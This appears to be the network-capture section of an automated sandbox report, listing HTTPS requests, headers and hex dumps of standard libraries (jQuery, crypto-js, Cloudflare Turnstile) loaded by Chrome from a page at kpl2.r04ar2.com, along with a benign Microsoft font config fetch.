                                                          Date: Tue, 27 Aug 2024 22:10:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Access-Control-Allow-Origin: *
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oi0e9I4ILD9Uzl5XYnS1VlLlSG%2F2Y6pneEJ%2FeguoqSSDW0Vc5e%2Bvy5%2BatR8R5f5xnPWfzUNdv%2Fj%2FNiS5co9kiqzmX0LNd7m7%2F1Wke5bid7NxBHiOgYmP2Fb98Upe8v1goF4%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f6480be4e80d9-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-08-27 22:10:38 UTC6INData Raw: 31 0d 0a 30 0d 0a
                                                          Data Ascii: 10
                                                          2024-08-27 22:10:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.449746184.28.90.27443
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:10:36 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          Accept-Encoding: identity
                                                          User-Agent: Microsoft BITS/7.8
                                                          Host: fs.microsoft.com
                                                          2024-08-27 22:10:36 UTC466INHTTP/1.1 200 OK
                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                          Content-Type: application/octet-stream
                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                          Server: ECAcc (lpl/EF17)
                                                          X-CID: 11
                                                          X-Ms-ApiVersion: Distribute 1.2
                                                          X-Ms-Region: prod-weu-z1
                                                          Cache-Control: public, max-age=62990
                                                          Date: Tue, 27 Aug 2024 22:10:36 GMT
                                                          Connection: close
                                                          X-CID: 2


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.449748184.28.90.27443
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:10:37 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          Accept-Encoding: identity
                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                          Range: bytes=0-2147483646
                                                          User-Agent: Microsoft BITS/7.8
                                                          Host: fs.microsoft.com
                                                          2024-08-27 22:10:37 UTC514INHTTP/1.1 200 OK
                                                          ApiVersion: Distribute 1.1
                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                          Content-Type: application/octet-stream
                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                          Server: ECAcc (lpl/EF06)
                                                          X-CID: 11
                                                          X-Ms-ApiVersion: Distribute 1.2
                                                          X-Ms-Region: prod-weu-z1
                                                          Cache-Control: public, max-age=66903
                                                          Date: Tue, 27 Aug 2024 22:10:37 GMT
                                                          Content-Length: 55
                                                          Connection: close
                                                          X-CID: 2
                                                          2024-08-27 22:10:37 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.449749151.101.130.1374431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:10:38 UTC533OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                          Host: code.jquery.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://kpl2.r04ar2.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:10:38 UTC612INHTTP/1.1 200 OK
                                                          Connection: close
                                                          Content-Length: 89501
                                                          Server: nginx
                                                          Content-Type: application/javascript; charset=utf-8
                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                          ETag: "28feccc0-15d9d"
                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                          Access-Control-Allow-Origin: *
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          Via: 1.1 varnish, 1.1 varnish
                                                          Accept-Ranges: bytes
                                                          Date: Tue, 27 Aug 2024 22:10:38 GMT
                                                          Age: 988421
                                                          X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740054-EWR
                                                          X-Cache: HIT, HIT
                                                          X-Cache-Hits: 5889, 1
                                                          X-Timer: S1724796639.595499,VS0,VE1
                                                          Vary: Accept-Encoding
                                                          2024-08-27 22:10:38 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                          2024-08-27 22:10:38 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                          Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                          2024-08-27 22:10:38 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                          Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                          2024-08-27 22:10:38 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                          Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                          2024-08-27 22:10:38 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                          Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                          2024-08-27 22:10:38 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                          Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                          2024-08-27 22:10:38 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                          Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                          2024-08-27 22:10:38 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                          Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                          2024-08-27 22:10:38 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                          Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                          2024-08-27 22:10:38 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                          Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.449751104.18.94.414431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:10:38 UTC559OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://kpl2.r04ar2.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:10:38 UTC386INHTTP/1.1 302 Found
                                                          Date: Tue, 27 Aug 2024 22:10:38 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                          cross-origin-resource-policy: cross-origin
                                                          location: /turnstile/v0/b/6790c32b9fc9/api.js
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f648f4b604402-EWR
                                                          alt-svc: h3=":443"; ma=86400


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.449750104.17.25.144431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:10:38 UTC561OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                          Host: cdnjs.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://kpl2.r04ar2.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:10:38 UTC963INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:10:38 GMT
                                                          Content-Type: application/javascript; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Access-Control-Allow-Origin: *
                                                          Cache-Control: public, max-age=30672000
                                                          ETag: W/"61182885-40eb"
                                                          Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                          cf-cdnjs-via: cfworker/kv
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          Timing-Allow-Origin: *
                                                          X-Content-Type-Options: nosniff
                                                          CF-Cache-Status: HIT
                                                          Age: 3812676
                                                          Expires: Sun, 17 Aug 2025 22:10:38 GMT
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ydMTcGh58meSXC1VUnH%2BUxXbfx8wozjde4bmL4oIH8x5p1HHc4%2B0A4sf6sSPeP71%2Fdco298NGFzv9b%2BRI1ke6lxuR9upUp1KpBLR4AzKJqmTknTbkiy%2Bzrhd0uw4S4Wm7LgRefjj"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                          Strict-Transport-Security: max-age=15780000
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f648f4b990f77-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-08-27 22:10:38 UTC406INData Raw: 37 62 65 36 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                          Data Ascii: 7be6!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                          2024-08-27 22:10:38 UTC1369INData Raw: 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74
                                                          Data Ascii: ypeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object
                                                          2024-08-27 22:10:38 UTC1369INData Raw: 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42
                                                          Data Ascii: one.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomB
